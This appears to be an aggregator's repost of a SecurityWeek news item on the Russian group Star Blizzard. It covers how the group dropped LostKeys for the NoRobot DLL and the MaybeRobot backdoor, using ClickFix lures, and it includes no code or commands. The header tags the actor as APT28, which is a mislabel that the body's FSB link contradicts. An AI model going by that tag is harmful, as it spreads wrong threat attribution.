Star Blizzard APT Adopts New Backdoor After LostKeys Malware Exposure

Published 2025-10-23 11:33:45 | www.securityweek.com
Apt Malware Star Blizzard Mayberobot Norobot Actor: Star Blizzard (APT28) Sector: Government, Civil Society Region: Russia

🎙️ Paranoid Newscast

🎭
Credibility
75%
📊
Risk Score
72%
🎲
Likelihood
8/10
💥
Impact
9/10
🛡️
Priority
4/5
The Russian state-sponsored APT known as Star Blizzard has transitioned to using a new backdoor, MaybeRobot, following the public disclosure of its LostKeys malware. This change comes as the group continues to employ sophisticated infection techniques to target civil society members in Russia.

The Russian state- APT known as Star Blizzard has been using a new backdoor in attacks after its LostKeys malware was detailed in a public report in June, Google says. Also tracked as Callisto, ColdRiver, Seaborgium, and UNC4057, Star Blizzard has been active since at least 2019, and has been publicly linked to Russia’s Federal Security Service (FSB) by the US in December 2023. In a June report, Google detailed how the APT was using the ClickFix technique to deliver the LostKeys malware as part of a multi-stage infection chain that also involved the use of a first-stage PowerShell script. Within days of the report, Star Blizzard started using new malware families in attacks and never deployed LostKeys again, Google now says. The APT also dropped the PowerShell infection chain, opting instead to rely on the victim’s execution of a malicious DLL via rundll32. Initially analyzed by Zscaler in September, the recent Star Blizzard attacks continue to rely on ClickFix for infection: victims are lured to pages masquerading as information resources for members of civil society and think tanks in Russia and convinced to execute malicious commands in the Windows Run box. The commands result in a malicious DLL being downloaded on the victim’s system. Dubbed NoRobot by Google (and BaitSwitch by Zscaler), the DLL has been designed to retrieve the next-stage payload and achieve persistence. Earlier versions of NoRobot, Google says, were fetching a Python backdoor dubbed YesRobot, which had limited functionality and made typical backdoor functionality cumbersome to implement. Thus, the APT abandoned YesRobot in favor of a new backdoor, MaybeRobot (tracked as SimpleFix by Zscaler), also deployed via NoRobot. Deployed as a heavily obfuscated PowerShell script, the malware has support for three commands provided by its operator. Based on these, it can execute files, commands, and PowerShell blocks. Likely built to replace YesRobot, and offering increased flexibility in performing activities on the infected systems, MaybeRobot has minimal built-in functionality and still requires an operator for more complex operations. Between May and September 2025, Star Blizzard made multiple changes to NoRobot, mainly focused on evading detection, and updated its infection chain as it transitioned to deploying MaybeRobot as the final stage. “Over the course of this period of time, Coldriver simplified their malware infection chain and implemented basic evasion techniques, such as rotating infrastructure and file naming conventions, paths where files were retrieved from, how those paths were constructed, changing the export name and changing the DLL name,” Google explains.